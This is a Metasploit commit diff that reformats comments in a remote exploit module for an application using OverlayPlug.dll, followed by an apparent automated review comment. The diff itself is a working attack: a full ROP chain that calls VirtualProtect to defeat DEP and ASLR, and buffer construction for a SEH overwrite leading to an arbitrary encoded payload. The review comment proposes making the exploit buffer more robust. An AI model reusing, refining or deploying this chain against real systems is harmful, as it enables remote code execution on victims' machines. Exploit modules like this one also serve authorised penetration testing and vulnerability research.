Format issue fix
git-svn-id: file:///home/svn/framework3/trunk@12299 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
36367f8a67
commit
300989db5f
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Acidgen', #found the vulnerability
|
||||
'Acidgen', #found the vulnerability
|
||||
'corelanc0d3r', #rop exploit + msf module
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
|
@ -113,26 +113,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# one non-ASLR module is enough for generic ASLR & DEP bypass !
|
||||
# pvefindaddr rop 'n roll
|
||||
# First, grab VirtualProtect ptr
|
||||
0x10065292, # POP EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x106F4244, # IAT entry + offsqet (bad char friendly)
|
||||
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0xEFEFEFF0, # bye bye offset
|
||||
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [Module : OverlayPlug.dll] **
|
||||
0x10065292, # POP EAX # RETN [OverlayPlug.dll]
|
||||
0x106F4244, # IAT entry + offsqet (bad char friendly)
|
||||
0x10019762, # POP EBP # RETN [OverlayPlug.dll]
|
||||
0xEFEFEFF0, # bye bye offset
|
||||
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
|
||||
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : OverlayPlug.dll] **
|
||||
0x10016A56, # XCHG EAX,ESI [Module : OverlayPlug.dll] **
|
||||
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll]
|
||||
0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll]
|
||||
|
||||
# set size
|
||||
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)
|
||||
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0xEFEFEFF0, # boo
|
||||
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x10053E4C, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [Module : OverlayPlug.dll] **
|
||||
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
|
||||
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)
|
||||
0x10019762, # POP EBP # RETN [OverlayPlug.dll]
|
||||
0xEFEFEFF0, # boo
|
||||
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
|
||||
0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
|
||||
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
|
@ -155,38 +155,38 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
|
||||
# set NewProtect to 0x40
|
||||
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [Module : OverlayPlug.dll] **
|
||||
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
|
||||
# write pOldProtect to .data section
|
||||
0x1001AB51, # POP ECX # RETN [Module : OverlayPlug.dll] **
|
||||
0x1001AB51, # POP ECX # RETN [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10117030, # RW
|
||||
|
||||
# EDI : ROP NOP
|
||||
0x10057090, # POP EDI # RETN [Module : OverlayPlug.dll] **
|
||||
0x10057090, # POP EDI # RETN [OverlayPlug.dll]
|
||||
0x10057091, # ROP NOP
|
||||
|
||||
# pReturn2Payload
|
||||
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [Module : OverlayPlug.dll] **
|
||||
0x10016A56, # XCHG EAX,ESI # RETN [Module : OverlayPlug.dll] **
|
||||
0x1003C946, # ADD EAX,0A # RETN [Module : OverlayPlug.dll]
|
||||
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll]
|
||||
0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll]
|
||||
0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll]
|
||||
0x1003C946,
|
||||
0x1003C946,
|
||||
0x1003C946,
|
||||
|
@ -206,23 +206,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x1003C946,
|
||||
0x1003C946,
|
||||
0x1003C946,
|
||||
0x1001FDBD, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
|
||||
|
||||
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
|
||||
0x41414141,
|
||||
|
||||
# go
|
||||
0x10066F84, # PUSHAD # RETN [Module : OverlayPlug.dll] **
|
||||
0x10066F84, # PUSHAD # RETN [OverlayPlug.dll]
|
||||
].pack("V*")
|
||||
|
||||
|
||||
buffer = "<valitem name="
|
||||
buffer = "<valitem name="
|
||||
buffer << '"'
|
||||
buffer << rand_text_alphanumeric((target['OffSet']))
|
||||
buffer << rand_text_alphanumeric(4) #nseh
|
||||
buffer << rand_text_alphanumeric(4) #nseh
|
||||
buffer << pivot
|
||||
buffer << rand_text_alphanumeric((target['OffSetToRop']))
|
||||
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7
|
||||
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7
|
||||
buffer << rop_gadgets
|
||||
buffer << "\x90" * 150
|
||||
buffer << payload.encoded
|
||||
|
|
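Review bot: The ROP-NOP address on the `buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7` line of the last hunk is a hand-encoded copy of the `0x10057091, # ROP NOP` entry already listed under `# EDI : ROP NOP` in the gadget table, so the same OverlayPlug.dll address lives in two forms and a future change to that gadget would have to be corrected in both places; packing it from the integer, `buffer << [0x10057091].pack("V") * 10 #rop nop, offset Win7`, keeps one source of truth and makes the byte order explicit. In the same spirit, the filler entries use `rand_text_alphanumeric(4).unpack("L")[0].to_i`, which is host-endian, while the chain is emitted with `.pack("V*")`; since these values are random padding this does not change behaviour, but `unpack("V")` would read consistently with the pack call. The comment `# IAT entry + offsqet (bad char friendly)` in the second hunk still carries the typo on the new side and should read `# IAT entry + offset (bad char friendly)`. The method that builds `rop_gadgets` and `buffer` appears to start before the first hunk and continue past the last one.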